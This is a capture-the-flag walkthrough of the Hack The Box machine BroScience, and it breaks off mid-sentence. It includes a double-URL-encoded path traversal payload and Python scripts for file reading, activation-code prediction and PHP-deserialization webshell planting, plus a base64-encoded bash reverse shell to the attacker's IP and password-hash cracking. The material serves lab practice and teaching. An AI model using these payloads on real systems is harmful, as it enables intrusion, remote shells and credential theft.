# BroScience - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

BroScience is an incredible medium-rated HTB machine created by [bmdyy](https://twitter.com/bmdyy)

Initially, we bypass a filter to get local file read. Using the LFR, we can get the source code of the web application.  
With the source, we deduce the activation code for our account as it used a bad PRNG seed.  
For foothold, we manually exploit a PHP deserialization vulnerability.  
We obtain a salted hash from a PostgreSQL database and crack it for lateral movement.  
Finally, we inject OS commands in the `commonName` field of an `openssl` certificate to get command execution as root.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.195
Nmap scan report for 10.10.11.195
Host is up (0.12s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80,443 -oN BroScience.nmap 10.10.11.195
Nmap scan report for 10.10.11.195
Host is up (0.096s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 df:17:c6:ba:b1:82:22:d9:1d:b5:eb:ff:5d:3d:2c:b7 (RSA)
|   256 3f:8a:56:f8:95:8f:ae:af:e3:ae:7e:b8:80:f6:79:d2 (ECDSA)
|_  256 3c:65:75:27:4a:e2:ef:93:91:37:4c:fd:d9:d4:63:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.54
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Did not follow redirect to https://broscience.htb/
443/tcp open  ssl/http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
| tls-alpn: 
|_  http/1.1
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_ssl-date: TLS randomness does not represent time
|_http-title: BroScience : Home
| ssl-cert: Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT
| Not valid before: 2022-07-14T19:48:36
|_Not valid after:  2023-07-14T19:48:36
Service Info: Host: broscience.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Pretty standard stuff here; the usual SSH, HTTP and HTTPS ports are open.  
Port 80 redirects to port 443 and leaks the domain name.  
Hence, we can add this line to `/etc/hosts`:

```text
10.10.11.195 broscience.htb
```

This is the website home page:

![1](images/1.png)

`gobuster` in `vhost` mode did not find anything.  
But it found several routes in `dir` mode:

```console
opcode@parrot$ gobuster dir -u https://broscience.htb/ -w ~/wordlists/raft-small-words.txt -x php -k -r -q
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/includes             (Status: 200) [Size: 1753]
/login.php            (Status: 200) [Size: 1936]
/images               (Status: 200) [Size: 2456]
/index.php            (Status: 200) [Size: 9305]
/register.php         (Status: 200) [Size: 2161]
/user.php             (Status: 200) [Size: 1309]
/comment.php          (Status: 200) [Size: 1936]
/logout.php           (Status: 200) [Size: 9305]
/styles               (Status: 200) [Size: 1134]
/javascript           (Status: 403) [Size: 280] 
/.                    (Status: 200) [Size: 9305]
/manual               (Status: 200) [Size: 676] 
/activate.php         (Status: 200) [Size: 1256]
/server-status        (Status: 403) [Size: 280] 
/exercise.php         (Status: 200) [Size: 1322]
/update_user.php      (Status: 200) [Size: 1936]
```

I learnt that directory listing is enabled by visiting `/includes`.  
Inside `/includes`, I found `db_connect.php`, `header.php`, `img.php`, `navbar.php` and `utils.php`, but their contents were not visible.

`/manual` is just apache manual.  
`/activate.php` is for account activation, but it also needs the activation code.  
(`/register.php` works for account creation, but we need to activate account first to use it)  
`/update_user.php` requires us to login first.

## IDOR

Visiting <https://broscience.htb/user.php>, we'd get the error "Missing ID value"  
Visiting <https://broscience.htb/user.php?id=1> would show us information about the Adminitrator user.  
We can enumerate all users by changing the `id` integer.

I found the following users:

```text
administrator, bill, michael, john, dmytro
```

## Parameter fuzzing

Visiting <https://broscience.htb/activate.php>, we'd get the error "Missing activation code"  
I decided to fuzz the parameter for this one:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/burp-parameter-names.txt -u 'https://broscience.htb/activate.php?FUZZ=abcd' -mc all -fr 'Missing' 2>/dev/null
code                    [Status: 200, Size: 1256, Words: 293, Lines: 28, Duration: 91ms]
```

I tried SQL injection on every parameter I found, but that got me nowhere.  
I also tried to make my username \<b\>opcode\</b\>, but it seems to be sanitized.

## Local File Read

Visiting <https://broscience.htb/includes/img.php> shows the error message: "Error: Missing 'path' parameter"  
Trying <https://broscience.htb/includes/img.php?path=/etc/passwd> results in:

```text
Error: Attack detected.
```

It's a battle against the filter now. I tried to automate it for once.  
I used the wordlist from <https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/traversal.txt>

```console
opcode@parrot$ ffuf -c -w ~/wordlists/fuzzing/traversal.txt -u 'https://broscience.htb/includes/img.php?path=FUZZ' -mc all -fs 0,30
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 [Status: 200, Size: 2235, Words: 26, Lines: 40, Duration: 103ms]
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 [Status: 200, Size: 2235, Words: 26, Lines: 40, Duration: 103ms]
```

Now that's a wild payload, but it works:

```console
opcode@parrot$ curl 'https://broscience.htb/includes/img.php?path=%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34' -k
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[--SNIP--]
bill:x:1000:1000:bill,,,:/home/bill:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
postgres:x:117:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
```

I googled it to make sense of it. Essentially, it is double encoding in an unusual manner.  
For example, `.` URL encoded is `%2e`  
Now `2` and `e` can be URL encoded to `%32`  to `%65` respectively.  
This finally results in `%%32%65`

I decided to create a python script, [read_file.py](read_file.py) to exploit it:

```py
import socket
import ssl
from argparse import ArgumentParser


def url_encode(text):
    return "".join(f"%{ord(i):2x}" for i in text)


def url_encode_inception(path):
    double_encoded_path = ""
    for i in path:
        double_encoded_path += f"%{url_encode(url_encode(i)[1:])}"

    return double_encoded_path


def get_contents(host, path):
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s_sock = context.wrap_socket(s, server_hostname=host)
    s_sock.connect((host, 443))

    method = b"GET "
    path = path.encode()
    protocol = b" HTTP/1.1\r\n"
    host_header = b"Host:" + host.encode() + b"\r\n\r\n"

    s_sock.send(method + path + protocol + host_header)
    response = s_sock.recv(4096)
    response = response.split(b"\r\n\r\n")[-1]

    return response.decode()


if __name__ == "__main__":
    parser = ArgumentParser(
        add_help=True,
        description="Make LFR requests after double encoding entire path",
    )
    parser.add_argument(
        "--host",
        action="store",
        default="broscience.htb",
        metavar="HOST",
        help="The host",
    )
    parser.add_argument(
        "--static",
        action="store",
        default="/includes/img.php?path=",
        metavar="STATIC_URL",
        help="The part of URL that remains intact",
    )
    parser.add_argument(
        "--path",
        action="store",
        required=True,
        metavar="PATH",
        help="The part of URL to encode",
    )

    options = parser.parse_args()

    encoded_path = url_encode_inception(options.path)
    path = options.static + encoded_path

    content = get_contents(options.host, path)
    print(content)
```

It would not work for large files, but I don't care.

```console
opcode@parrot$ python3 read_file.py --path ../../../../etc/hosts                                 
127.0.0.1   localhost
127.0.1.1   broscience.htb
```

I tried to look at apache configuration:

```console
opcode@parrot$ python3 read_file.py --path ../../../../etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
    ServerName broscience.htb
    Redirect permanent / https://broscience.htb/    
</VirtualHost>
<VirtualHost *:443>
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
    SSLEngine on
    SSLCertificateFile /etc/apache2/certificate/apache-certificate.crt
    SSLCertificateKeyFile /etc/apache2/certificate/apache.key
</VirtualHost>
```

`proc` pseudo filesystem works for `cmdline`, but not for `environ`:

```console
opcode@parrot$ python3 read_file.py --path ../../../../proc/self/cmdline                         
/usr/sbin/apache2-kstart
```

## LFR to get application source

Next, I decided to look at application source code.

```console
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/includes/db_connect.php
```

I got:

```php
<?php
$db_host = "localhost";
$db_port = "5432";
$db_name = "broscience";
$db_user = "dbuser";
$db_pass = "RangeOfMotion%777";
$db_salt = "NaCl";

$db_conn = pg_connect("host={$db_host} port={$db_port} dbname={$db_name} user={$db_user} password={$db_pass}");

if (!$db_conn) {
    die("<b>Error</b>: Unable to connect to database");
}
?>
```

We have postgreSQL credentials:

```text
dbuser:RangeOfMotion%777
```

I tried it on SSH and against every user on the blog, but it didn't work.

```console
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/includes/img.php       
```

```php
<?php
if (!isset($_GET['path'])) {
    die('<b>Error:</b> Missing \'path\' parameter.');
}

// Check for LFI attacks
$path = $_GET['path'];

$badwords = array("../", "etc/passwd", ".ssh");
foreach ($badwords as $badword) {
    if (strpos($path, $badword) !== false) {
        die('<b>Error:</b> Attack detected.');
    }
}

// Normalize path
$path = urldecode($path);

// Return the image
header('Content-Type: image/png');
echo file_get_contents('/var/www/html/images/' . $path);
?>
```

Such evil filters 😢  
This filter on `/etc/passwd` explains why my payload was so convoluted.  
A simpler payload should work for files that are not `/etc/passwd`.

```console
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/register.php
```

It is a mess, so I'll show the relevant part only:

```php
include_once 'includes/utils.php';
$activation_code = generate_activation_code();
$res = pg_prepare($db_conn, "check_code_unique_query", 'SELECT id FROM users WHERE activation_code = $1');
$res = pg_execute($db_conn, "check_code_unique_query", array($activation_code));

if (pg_num_rows($res) == 0) {
    $res = pg_prepare($db_conn, "create_user_query", 'INSERT INTO users (username, password, email, activation_code) VALUES ($1, $2, $3, $4)');
    $res = pg_execute($db_conn, "create_user_query", array($_POST['username'], md5($db_salt . $_POST['password']), $_POST['email'], $activation_code));

    // TODO: Send the activation link to email
    $activation_link = "https://broscience.htb/activate.php?code={$activation_code}";

    $alert = "Account created. Please check your email for the activation link.";
    $alert_type = "success";
}
```

It seems safe. I reviewed the entire source code, and most of it looks safe.

## Abuse bad PRNG seed

Although most of the codebase is safe, all the spice is in `utils.php`.  
In there, we also have the code responsible for the generation of activation_code:

```php
function generate_activation_code() {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    srand(time());
    $activation_code = "";
    for ($i = 0; $i < 32; $i++) {
        $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
    }
    return $activation_code;
}
```

Seeding with current time is not a good idea. The activation code is deterministic now.  
I went an extra step and figured out how to implement PHP's `rand` and `srand` in python.
You can look at the code [here](php_mt.py)

I created another script to create and activate an account: [activate_account.py](activate_account.py):

```py
import requests
from argparse import ArgumentParser
from datetime import datetime, timezone
from string import ascii_letters, digits


class Mersenne_Twister:
    def __init__(self, seed=None):
        self.state = [0] * 624
        self.index = 0

        if seed is None:
            seed = randrange(2**32)

        self.setSeed(seed)

    def setSeed(self, seed):
        self.state[0] = seed & 0xFFFFFFFF

        for i in range(1, 624):
            self.state[i] = (
                0x6C078965 * (self.state[i - 1] ^ (self.state[i - 1] >> 30)) + i
            ) & 0xFFFFFFFF

    def generateTwister(self):
        for i in range(624):
            y = (self.state[i] & 0x80000000) + (self.state[(i + 1) % 624] & 0x7FFFFFFF)
            self.state[i] = self.state[(i + 397) % 624] ^ (y >> 1)

            if y % 2 != 0:
                self.state[i] = self.state[i] ^ 0x9908B0DF

    def getNext(self, min_val=None, max_val=None):
        if min_val is not None and max_val is not None and min_val > max_val:
            raise ValueError("min_val must be less than or equal to max_val")

        if self.index == 0:
            self.generateTwister()

        y = self.state[self.index]
        y = y ^ (y >> 11)
        y = y ^ ((y << 7) & 0x9D2C5680)
        y = y ^ ((y << 15) & 0xEFC60000)
        y = y ^ (y >> 18)

        self.index = (self.index + 1) % 624

        if min_val is None and max_val is None:
            return y

        range_size = max_val - min_val + 1
        return min_val + (y % range_size)


def datetime_to_epoch(dt_string):
    # Tue, 14 Feb 2023 15:31:02 GMT
    dt_object = datetime.strptime(dt_string, "%a, %d %b %Y %H:%M:%S %Z")
    dt_object = dt_object.replace(tzinfo=timezone.utc)

    return int(dt_object.timestamp())


def get_registration_timestamp(username, email, password):
    url = "https://broscience.htb"
    payload = {
        "username": username,
        "email": email,
        "password": password,
        "password-confirm": password,
    }
    r = requests.post(
        f"{url}/register.php",
        data=payload,
        proxies=proxy,
        verify=False,
    )

    assert "Account created." in r.text
    return r.headers["Date"]


def activate_account(code):
    url = "https://broscience.htb"
    r = requests.get(f"{url}/activate.php?code={code}", proxies=proxy, verify=False)

    assert "Account activated!" in r.text


if __name__ == "__main__":
    parser = ArgumentParser(
        add_help=True,
        description="Script to create and activate account on broscience.htb",
    )
    parser.add_argument(
        "--cred",
        action="store",
        default="opcode",
        metavar="CRED",
        help="The username as well as the password",
    )

    options = parser.parse_args()

    proxy = {}
    # proxy["https"] = "http://127.0.0.1:8080"

    requests.urllib3.disable_warnings()

    timestamp = get_registration_timestamp(
        options.cred, f"{options.cred}@op.htb", options.cred
    )
    epoch = datetime_to_epoch(timestamp)

    mt = Mersenne_Twister(epoch)

    scope = ascii_letters + digits[1:] + digits[0]
    activation_code = "".join([scope[mt.getNext(0, len(scope) - 1)] for i in range(32)])
    print(f"Activation code: {activation_code}")

    activate_account(activation_code)
    print(f"Account created with credentials:\n{options.cred}:{options.cred}")
```

```console
opcode@parrot$ python3 activate_account.py             
Activation code: s3B26KISuJAZ7Elo812fEznim7OsZxBd
Account created with credentials:
opcode:opcode
```

We can now log in with credentials `opcode:opcode`

## Replicating the web application locally

After logging in, we found a new button, `swap_theme.php` which can be used for swapping themes.  
The source for this functionality can be seen in `utils.php`, and they heavily suggest a PHP deserialization vulnerability.  
I suck at manual deserialization, so I first replicated the web application locally.  
That would make things easier to debug.

```console
opcode@parrot$ mkdir app
opcode@parrot$ mkdir app/includes
opcode@parrot$ mkdir app/styles
```

After creating the directories, I downloaded the files:

```console
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/index.php > app/index.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/login.php > app/login.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/register.php > app/register.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/user.php > app/user.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/comment.php > app/comment.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/logout.php > app/logout.php  
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/activate.php > app/activate.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/exercise.php > app/exercise.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/update_user.php > app/update_user.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/swap_theme.php > app/swap_theme.php
```

```console
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/includes/utils.php > app/includes/utils.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/includes/header.php > app/includes/header.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/includes/img.php > app/includes/img.php      
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/includes/navbar.php > app/includes/navbar.php
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/includes/db_connect.php > app/includes/db_connect.php
```

```console
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/styles/light.css > app/styles/light.css
opcode@parrot$ python3 read_file.py --path ../../../../var/www/html/styles/dark.css > app/styles/dark.css
```

I also installed `php-pgsql`:

```console
opcode@parrot$ sudo apt-get install php-pgsql
```

Now comes the database setup. I created a `docker-compose.yml`:

```yaml
services:
  db:
    image: postgres
    restart: always
    environment:
      POSTGRES_DB: broscience
      POSTGRES_USER: dbuser
      POSTGRES_PASSWORD: RangeOfMotion%777
    ports:
      - 5432:5432
```

I started the container with:

```console
opcode@parrot$ docker compose up
```

The next step was to create the same schema as on the box.  
It was a process of guessing and looking at the error messages.

I connected to the database:

```console
opcode@parrot$ docker run -it --rm --network='host' -e PGPASSWORD='RangeOfMotion%777' postgres psql -h 127.0.0.1 -U dbuser -d broscience
```

And ran some queries:

```sql
CREATE TABLE users (
  id SERIAL PRIMARY KEY,
  username VARCHAR(50) NOT NULL,
  password VARCHAR(100) NOT NULL,
  email VARCHAR(255) UNIQUE NOT NULL,
  activation_code VARCHAR(255) NOT NULL,
  is_activated BOOLEAN,
  is_admin BOOLEAN,
  date_created TIMESTAMP NOT NULL DEFAULT NOW()
);

CREATE TABLE exercises (
  id SERIAL PRIMARY KEY,
  author_id INTEGER REFERENCES users(id),
  title VARCHAR(255) NOT NULL,
  image VARCHAR(255),
  content TEXT NOT NULL,
  date_created TIMESTAMP NOT NULL DEFAULT NOW()
);
```

I also wanted to have an activated admin account with credentials `opcode:opcode`  
Since they use `NaCl` as salt 😅,

```console
opcode@parrot$ echo -n 'NaClopcode' | md5sum
4ab4b8ddcbfe3b85774ccf2623be5a26  -
```

So, this should be the query to add user:

```sql
INSERT INTO users (username, password, email, activation_code, is_activated, is_admin)
VALUES ('opcode', '4ab4b8ddcbfe3b85774ccf2623be5a26', 'opcode@broscience.htb', 'TQ8WL8AXPEy77M6H2Ji1U7EFrFZ42JHk', true, true);
```

After that, we can start the php server inside `app/`:

```console
opcode@parrot$ php -S 127.0.0.1:8080
```

With the setup out of the way, we can attempt the deserialization locally.

## PHP deserialization for arbitrary file write

Let us look at the relevant functions inside `utils.php`:

```php
class UserPrefs {
    public $theme;

    public function __construct($theme = "light") {
        $this->theme = $theme;
    }
}

function get_theme() {
    if (isset($_SESSION['id'])) {
        if (!isset($_COOKIE['user-prefs'])) {
            $up_cookie = base64_encode(serialize(new UserPrefs()));
            setcookie('user-prefs', $up_cookie);
        } else {
            $up_cookie = $_COOKIE['user-prefs'];
        }
        $up = unserialize(base64_decode($up_cookie));
        return $up->theme;
    } else {
        return "light";
    }
}

function get_theme_class($theme = null) {
    if (!isset($theme)) {
        $theme = get_theme();
    }
    if (strcmp($theme, "light")) {
        return "uk-light";
    } else {
        return "uk-dark";
    }
}

function set_theme($val) {
    if (isset($_SESSION['id'])) {
        setcookie('user-prefs',base64_encode(serialize(new UserPrefs($val))));
    }
}

class Avatar {
    public $imgPath;

    public function __construct($imgPath) {
        $this->imgPath = $imgPath;
    }

    public function save($tmp) {
        $f = fopen($this->imgPath, "w");
        fwrite($f, file_get_contents($tmp));
        fclose($f);
    }
}

class AvatarInterface {
    public $tmp;
    public $imgPath; 

    public function __wakeup() {
        $a = new Avatar($this->imgPath);
        $a->save($this->tmp);
    }
}
?>
```

The `get_theme()` function gets used by `swap_theme.php`  
If the `user-prefs` cookie is not set, the `get_theme()` function creates it.  
But if it is set, it simply base64 decodes and deserializes it.

```php
        if (!isset($_COOKIE['user-prefs'])) {
            $up_cookie = base64_encode(serialize(new UserPrefs()));
            setcookie('user-prefs', $up_cookie);
        } else {
            $up_cookie = $_COOKIE['user-prefs'];
        }
        $up = unserialize(base64_decode($up_cookie));
        return $up->theme;
```

We can have arbitrary objects in the cookie and unserialize them.  
We even have the PHP magic method `__wakeup()` in class AvatarInterface:

```php
class AvatarInterface {
    public $tmp;
    public $imgPath; 

    public function __wakeup() {
        $a = new Avatar($this->imgPath);
        $a->save($this->tmp);
    }
}
```

But there is no reliable POP gadget that could allow for RCE.  
But thanks to the class `Avatar`, we can reliably transfer the contents from a file `$tmp` to another file at `$imgPath`

It seemed useless at first glance, but if we use `file_get_contents` on a remote resource, we could write arbitrary things into a file of our choice (e.g. place webshell at `/var/www/html/opcode.php`)  
We are going to do just that.

I started with this very basic payload first, fully expecting it to not work:

```php
<?php
class AvatarInterface {
    public $tmp = "/home/opcode/webshell.php";
    public $imgPath = "/tmp/opcode.php";
}

echo base64_encode(serialize(new AvatarInterface)) . "\n";
?>
```

After running `php exploit.php`, I got the base64 encoded payload.  
After adding it to the cookie and clicking the "swap theme" button, the exploit actually worked.  
With that, all my efforts for replicating the environment locally were wasted 🥲.

I modified the exploit for remote:

```php
<?php
class AvatarInterface {
    public $tmp = "http://10.10.14.31:8000/webshell.php";
    public $imgPath = "/var/www/html/opcode.php";
}

echo base64_encode(serialize(new AvatarInterface)) . "\n";
?>
```

```console
opcode@parrot$ php exploit.php
TzoxNToiQXZhdGFySW50ZXJmYWNlIjoyOntzOjM6InRtcCI7czozNjoiaHR0cDovLzEwLjEwLjE0LjMxOjgwMDAvd2Vic2hlbGwucGhwIjtzOjc6ImltZ1BhdGgiO3M6MjQ6Ii92YXIvd3d3L2h0bWwvb3Bjb2RlLnBocCI7fQ==
```

Then I created a webshell, and hosted it:

```php
<?php system($_SERVER['HTTP_USER_AGENT']); ?>
```

After that, I updated the cookie on the website and clicked the button to swap theme.  
And just like that, I got RCE:

```console
opcode@parrot$ curl https://broscience.htb/opcode.php -k -A 'id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

To get a shell, I did:

```console
opcode@parrot$ curl https://broscience.htb/opcode.php -k -A 'echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMzEvOTAwMSAgMD4mMScK | base64 -d | bash'
```

Since it is a `www-data` shell, I wanted to automate this exploit.  
I created another python script [run_commands.py](run_commands.py):

```py
from uuid import uuid4
from base64 import b64encode
from argparse import ArgumentParser
from http.server import HTTPServer, BaseHTTPRequestHandler

from socket import socket, AF_INET, SOCK_DGRAM, inet_ntoa
from struct import pack
from fcntl import ioctl

import requests
import threading
import cmd


class WebshellPrompt(cmd.Cmd):
    prompt = "$ "

    def default(self, line):
        output = os_command(filename, line)
        print(output)

    def do_exit(self, arg):
        return True


def get_tun_ip():
    sock = socket(AF_INET, SOCK_DGRAM)
    packed_addr = ioctl(sock.fileno(), 0x8915, pack("256s", b"tun0"))[20:24]

    return inet_ntoa(packed_addr)


def login(username, password):
    payload = {"username": username, "password": password}

    sess = requests.Session()
    sess.get(URL + "/login.php", proxies=proxy, verify=False)
    r = sess.post(URL + "/login.php", data=payload, proxies=proxy, verify=False)

    return sess


def invoke_deserialization(session, ip):
    filename = str(uuid4()) + ".php"
    size = 23 + len(ip)
    deserialization_payload = f'O:15:"AvatarInterface":2:{{s:3:"tmp";s:{size}:"http://{ip}:1337/opcode.php";s:7:"imgPath";s:54:"/var/www/html/{filename}";}}'
    deserialization_payload = b64encode(deserialization_payload.encode())

    sess = session
    sess.cookies.set(
        "user-prefs",
        deserialization_payload.decode(),
        domain="broscience.htb",
        path="/",
    )
    sess.get(URL + "/swap_theme.php", proxies=proxy, verify=False)

    return filename


def shell_host(local_port, payload):
    class HostHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.send_header("Content-type", "application/octet-stream")
            self.send_header("Content-Length", len(payload))
            self.end_headers()
            self.wfile.write(payload.encode())

    httpd = HTTPServer(("", local_port), HostHandler)

    return httpd


def os_command(filename, command):
    url = f"{URL}/{filename}"
    header = {"Accept-Language": command}

    r = requests.get(url, headers=header, proxies=proxy, verify=False)

    return r.text


if __name__ == "__main__":
    URL = "https://broscience.htb"
    WEBSHELL = "<?php system($_SERVER[HTTP_ACCEPT_LANGUAGE]); ?>"

    proxy = {}
    # proxy['https'] = 'http://127.0.0.1:8080'

    requests.urllib3.disable_warnings()

    parser = ArgumentParser(
        add_help=True,
        description="Script to create and activate account on broscience.htb",
    )
    parser.add_argument(
        "--username",
        action="store",
        default="opcode",
        metavar="USERNAME",
        help="The username",
    )
    parser.add_argument(
        "--password",
        action="store",
        default="opcode",
        metavar="PASSWORD",
        help="The password",
    )

    options = parser.parse_args()

    httpd = shell_host(1337, WEBSHELL)
    httpd_thread = threading.Thread(target=httpd.serve_forever)
    httpd_thread.start()

    session = login(options.username, options.password)
    ip = get_tun_ip()
    filename = invoke_deserialization(session, ip)

    httpd.shutdown()
    httpd_thread.join()

    prompt = WebshellPrompt()
    prompt.cmdloop()
```

It works fine:

![2](images/2.png)

This shell would only work until the cleanup cron job runs. So I recommend upgrading to a more stable shell in the meantime.

### Intended route - using the PHP sessions file

After doing the box, I talked to the box author and learnt that setting `$tmp` to an external URL was not the intended approach.  
Instead, you were expected to make use of the PHP sessions file.

First, using the `edit_user` feature I changed my username to `<?php system($_SERVER['HTTP_USER_AGENT']); ?>`  
Then I looked at the cookies and found my PHPSESSID to be `qgkmpb5rhu422rutcg11nu1vf4`

I created the new exploit:

```php
<?php
class AvatarInterface {
    public $tmp = "/var/lib/php/sessions/sess_qgkmpb5rhu422rutcg11nu1vf4";
    public $imgPath = "/var/www/html/opcode.php";
}

echo base64_encode(serialize(new AvatarInterface)) . "\n";
?>
```

```console
opcode@parrot$ php exploit.php            
TzoxNToiQXZhdGFySW50ZXJmYWNlIjoyOntzOjM6InRtcCI7czo1MzoiL3Zhci9saWIvcGhwL3Nlc3Npb25zL3Nlc3NfcWdrbXBiNXJodTQyMnJ1dGNnMTFudTF2ZjQiO3M6NzoiaW1nUGF0aCI7czoyNDoiL3Zhci93d3cvaHRtbC9vcGNvZGUucGhwIjt9
```

I set the value of `user-prefs` cookie to this base64 encoded string and clicked the "swap theme" button.  
I was able to get RCE after that:

```console
opcode@parrot$ curl 'https://broscience.htb/opcode.php' -k -A 'id'
id|s:1:"6";username|s:45:"uid=33(www-data) gid=33(www-data) groups=33(www-data)
";is_admin|s:1:"0";
```

## Enumerating PostgreSQL database

After getting a shell, I ran `linpeas.sh`. Sadly, I could not find any useful leads.  
But since we have DB credentials, we can have a look at the PostgreSQL database.

```console
www-data@broscience:/$ PGPASSWORD='RangeOfMotion%777' psql -h 127.0.0.1 -U dbuser -d broscience
```

```console
broscience=> \d
                List of relations
 Schema |       Name       |   Type   |  Owner   
--------+------------------+----------+----------
 public | comments         | table    | postgres
 public | comments_id_seq  | sequence | postgres
 public | exercises        | table    | postgres
 public | exercises_id_seq | sequence | postgres
 public | users            | table    | postgres
 public | users_id_seq     | sequence | postgres
```

`users` is the table of interest.

```console
broscience=> select * from users;
id |   username    |             password             |            email             |         activation_code          | is_activated | is_admin |         date_created          
----+---------------+----------------------------------+------------------------------+----------------------------------+--------------+----------+-------------------------------
  1 | administrator | 15657792073e8a843d4f91fc403454e1 | administrator@broscience.htb | OjYUyL9R4NpM9LOFP0T4Q4NUQ9PNpLHf | t            | t        | 2019-03-07 02:02:22.226763-05
  2 | bill          | 13edad4932da9dbb57d9cd15b66ed104 | bill@broscience.htb          | WLHPyj7NDRx10BYHRJPPgnRAYlMPTkp4 | t            | f        | 2019-05-07 03:34:44.127644-04
  3 | michael       | bd3dad50e2d578ecba87d5fa15ca5f85 | michael@broscience.htb       | zgXkcmKip9J5MwJjt8SZt5datKVri9n3 | t            | f        | 2020-10-01 04:12:34.732872-04
  4 | john          | a7eed23a7be6fe0d765197b1027453fe | john@broscience.htb          | oGKsaSbjocXb3jwmnx5CmQLEjwZwESt6 | t            | f        | 2021-09-21 11:45:53.118482-04
  5 | dmytro        | 5d15340bded5b9395d5d14b9c21bc82b | dmytro@broscience.htb        | 43p9iHX6cWjr9YhaUNtWxEBNtpneNMYm | t            | f        | 2021-08-13 10:34:36.226763-04
```

## Cracking salted hash with john

Since `bill` is also a user on the box, we can attempt to crack his password.  
We need to modify the command a bit because a salt is being used:

```console
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt -form=dynamic='md5($s.$p)' hash
```

It cracks instantly, and we get the credentials:

```text
bill:iluvhorsesandgym
```

They can be used for SSH:

```console
opcode@parrot$ sshpass -p 'iluvhorsesandgym' ssh -o StrictHostKeyChecking=no bill@broscience.htb
```

## `pspy` issue

Initially, I was unable to get `pspy` to work on this box.  
So I wanted to try the primitive approach that `linpeas.sh` uses to monitor repeating processes.

```bash
temp_file=$(mktemp); if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" > /tmp/data; fi
```

It runs `ps -e -o command` every 0.05 seconds and appends the result to a temporary file. It does the same 1250 times, spanning over 1250*0.05 seconds, which is approximately one minute.  
After that, it sorts and finds out unique processes and their occurrence counts.  
Then it removes specific processes and presents us the sorted data of processes which showed up in `ps -e -o command` for the least times.

It failed to show processes (I was intentionally running very specific processes from another terminal while this script was running)

Next, I want to write a program that uses `inotify` api itself to monitor the processes.  
I was able to find working code at <https://developer.ibm.com/tutorials/l-ubuntu-inotify/>  
With help from ChatGPT and <https://www.man7.org/linux/man-pages/man7/inotify.7.html> I was able to get it to work for regular directories.  
The code is here at [failed_inotify.c](failed_inotify.c)

It works for regular directories but not for `/proc`. I noticed this excerpt on man page:

```text
